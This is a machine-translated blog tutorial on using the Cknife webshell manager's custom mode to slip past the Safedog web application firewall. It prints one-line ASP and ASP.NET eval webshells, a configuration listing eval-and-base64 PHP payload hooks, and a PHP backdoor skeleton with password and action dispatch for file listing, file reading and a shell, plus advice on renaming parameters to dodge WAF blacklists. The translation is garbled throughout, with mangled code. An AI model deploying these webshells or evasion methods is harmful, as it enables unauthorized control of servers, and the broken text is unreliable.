The method of hitting a dog stick: Cknife (C-knife) custom mode second-over-safe dog

Dog hitting: Cknife (C-knife) custom mode second-over-safe dog Disclaimer: This site provides security tools, programs (methods) may be offensive, it is only for security research and teaching, and is at your own risk! Related reading:

Cross-platform Chinese kitchen knife Cknife released

Cknife, cross-platform Chinese kitchen knife open source

0 × 00 preface

Many of my friends mistakenly thought that she was only a cross-platform upgrade version of the kitchen knife and only had cross-platform features. In fact, the friends did not use the essence, she is also a powerful WAF tool. I didn't explain how to use it. it was my responsibility. I was a responsible baseline and I would be responsible for it. so I had the following article:

0 × 01

Cknife has two WAF modes: one is to modify the configuration file (Config. ini) through WAF, and the other is to Customize the mode through WAF. Today, we will take the custom mode as an example to explain how to use a dongle for a second. of course, after the article is published, major WAF vendors will definitely blacklist some features. here is just a reference to provide ideas.

0 × 02 ReadMe.txt

Many friends seldom pay attention to her when using the software. here I have attached some content about WAF. please read the red part carefully.

[W words are omitted here]

Instructions for use:

Server scripts support ASP, ASPX, PHP, JSP, and mimize (custom ).

The code contains but is not limited to the following code (as long as eval-like functions can be constructed, such as PHP's create_function and assert)

ASP:

<%eval request("Cknife")%>

ASP. NET:

<%@ PageLanguage="Jscript"%><%eval(Request.Item["Cknife"],"unsafe");%>

PHP:

JSP:

[For details about the code, see 1.jsp]

Customize:

Custom type. the Function Code is saved on the server. Theoretically, all dynamic scripts are supported, as long as they interact with the C-knife correctly. This mode can be customized as needed. for example, the code can be very short if you only need to browse the directory or the virtual terminal function.

WAF:

This is a cross-platform configuration file-based Chinese kitchen knife. all operations are defined by users. the main program only displays images and sends data.

I separated every step and wrote it into the configuration file. you can customize any code, including changing the parameter name and content.

For example:

SKIN = javax. swing. plaf. nimbus. nimbusLookAndFeel sets the skin to nimbusSPL =-> | indicates the starting symbol SPR = | <-indicates the ending symbol CODE = code encoding parameter ACTION = action ACTION parameter PARAM1 = z1. 1PARAM2 = z2 parameter 2PHP_BASE64 = 1 when PHP is used, check whether automatic base64 encryption is enabled for Z1 and Z2 parameters. if you want to define your own encryption mode, disable the setting to 0PHP_MAKE = @ eval (base64_decode ($ _ POST [action, you do not need to use this method here. you can use any method you want PHP_INDEX =... the code for displaying the home page function is PHP_READDICT =... the code for reading the homepage function is PHP_READFILE =... put the code for reading the file function here PHP_DELETE =... put the code for deleting folders and files in PHP_RENAME =... put the code for renaming folders and file functions here PHP_NEWDICT =... the code for creating a directory function is stored here PHP_UPLOAD =... put the code for the file upload function here PHP_DOWNLOAD =... put the code for downloading the file function here PHP_SHELL =... code for the functions of the virtual terminal can be found here: PHP_DB_MYSQL =... the code for managing MYSQL database functions is put here ASP _... =... ASPX _... =... JSP _... =...

In addition to modifying the preceding parameters, the program also provides a Customize over WAF mode.

The Customize mode was originally used to support scripts that are not supported by some programs by default, such as CFM, ASMX, ASHX, and PY, as long as the user-written scripts can correctly interact with the kitchen knife.

In another way, if we write a PHP script to implement the column file and directory functions, it can correctly interact with the C-knife. if we choose PHP (Eval) the connection will fail.

Select Customize mode for connection. Why do you need to write so much code to connect in Customize mode? If a powerful WAF detects keywords such as eval and assert

In this case, you can use the normal code in the PHP script to implement the column files and directories, then, use the Customize mode to connect to WAF.

In the same mode as other modes, each step is written to the configuration file. you can also specify the parameter name and content.

For example, you have written the Customize. php Server connected in Customize mode.

The parameters submitted for displaying the homepage function should be: password = 1 & action = index and password = 1 & action = readdict.

If the C-knife is popularized, WAF vendors will definitely blacklist readdict. in this case, you can change the name of readdict to another name, and change the name of action, you can also change 1 to another character.

CUS_MAKE = 1CUS_INDEX = indexCUS_READDICT = readdictCUS_READFILE = readfileCUS_SAVEFILE = savefileCUS_DELETE = deleteCUS_RENAME = listener = uploadCUS_DOWNLOAD = downloadCUS_SHELL = shell [omit 1 W words here]

0 × 03 WAF principle in custom mode

If you only use one sentence, many vendors have killed eval and other sensitive keywords, as well as sensitive keywords in data packets during transmission. We only need to normally implement the column Directory, read file, and other functions, without including eval and other sensitive keywords, we can bypass WAF, that is, the server does not use a single sentence, instead, the function code is executed on the server, and the client submits normal data packets.

0 × 04 dog preparation

Some friends say they want to write their own column directories, read files, and so on. it is certainly no use. In fact, you don't need to write it by yourself. you just need to copy, paste, and modify it.

You need to have a little programming Foundation (don't worry about it as long as the if statement is used), and then add it according to the framework I have given. Take PHP as an example:

The framework is as follows:

$ Pwd = 'cknive'; // password

If ($ _ POST [$ pwd] = 1 ){

$ Act = $ _ POST ['action']; // action name

Echo ("-> |"); // Front separator

If ($ act = 'index') {// display the home page function

} Else if ($ act = 'readdict ') {// Read directory function

} Else if ($ act = ...) // The functions you want to implement can be decrypted from Config. ini.

{

}

Echo ("| <-"); // delimiter

}

?>

First open the cute Config. ini file and find PHP_INDEX.

It is the function of the C-knife file management to display the home page. we will first decrypt it, decrypt the url first, and then decrypt it with base64.

Put the decryption result in eclipse and sort it automatically (right-click Source-> Format)

Remove all the code before echo ("-> |") and all the code after echo ("| <. Copy the intermediate code to the corresponding function in the framework.

Then you can find PHP_READDICT for decryption. here, you should note that the base64_decode function is in front of the z1 parameter. in our custom mode, the transmission mode is the original file, and base64 encryption is not automatically performed,So we need to remove base64_decode. Function

In the old rule, remove all the code before echo ("-> |") and all the code after echo ("| <. Copy the intermediate code to the corresponding function in the framework. Note that the base64_decode function has been removed.

Finally, add the file reading function as follows, namely, PHP_READFILE.

Save the code as test. php and select the custom mode connection.

Test found no interception

We tried the next connection and found it would be intercepted.